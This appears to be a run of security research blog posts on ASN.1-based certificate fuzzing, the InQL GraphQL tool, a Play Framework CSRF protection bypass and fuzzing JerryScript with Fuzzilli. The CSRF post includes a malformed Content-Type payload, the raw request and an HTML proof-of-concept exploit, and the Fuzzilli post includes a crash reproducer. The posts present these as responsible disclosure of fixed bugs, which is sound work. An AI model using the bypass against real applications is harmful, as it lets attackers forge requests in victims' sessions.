A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At this first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields, for instance, integers and the string sizes can be restricted to an acceptable range.

The real complexity beasts however are information objects, parametrization and tabular constraints. Information objects allows the definition of templates for data types and a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    messageTypeId INTEGER UNIQUE
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD Sequence { ToMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OctetString}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that more often than not, data structures defined using ASN.1 are serialized and unserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by appending its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate using a browser integrated viewer.

Doyensec X509 certificate

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I can slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X509 certificates which looks like this

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can be already used for differential testing. For instance, if a library accepts the certificate while others don’t, there may be a problem that requires manual investigation.

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim at open sourcing it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged in fuzzing a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

InQL Scanner v2 is out!

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced the ability to have a Jython standalone GUI similar to the Burp’s one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to be able to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

InQL v2 Editor

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representation of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

CSRF Protection Bypass in Play Framework

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

By their own words, the Play Framework is a high velocity web framework for java and scala. It is built on Akka which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection were provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request even if this is through XMLHttpRequest. All rules and details can be seen in this Mozilla’s Developer Page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, then the browser will send a OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (until version 2.5, included), a black-list approach on receiving Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content type of “simple requests”. This has been considered as a valid (although not ideal) protection since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
var fwsStart = cursor rule {
zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
} }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) } def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) } def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=—some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response

Response:
HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8 Content-Length: 1
5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button> <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText; 
                } 
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. This issue was fixed on Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details have been published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

Fuzzing JavaScript Engines with Fuzzilli

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and enables you the definition of variables later used in the value section. The last one, variance is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one with the different type B, we have to include all the type A rules inside the type B object.

Here is an example of such rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software as a pure blackbox approach only scratches the attack surface. Coverage could be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output could be seen in the picture below. In my case, it was only useful for the manual code review and grammar adjustment, as there was no convenient way how to implement the mutator on the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is incredible and still a very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL could always be converted (lifted) to a valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Masters Thesis, where it was introduced, and I strongly recommend reading it as this article summarizes some of the novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork() and the measured execution per sample could be ~7 times faster. The JSE engine is modified to read the input from the fuzzer, and after it executes the sample, it obtains the coverage. The crucial part is to reset the state, which is normally (obviously) not done, as the engine uses the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented to feed the input or add additional commands.

Coverage

LLVM gives a convenient way to obtain the edge coverage. Providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we can receive a pointer to the start and end of the regions, which are initialized by the guard number, as can be read in the llvm documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to make the parent knows that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as we can see the memory corruption from the triage via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could be probably escalated from Denial of Service to Code Execution. Because of the time constraints and little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

Additional References

❌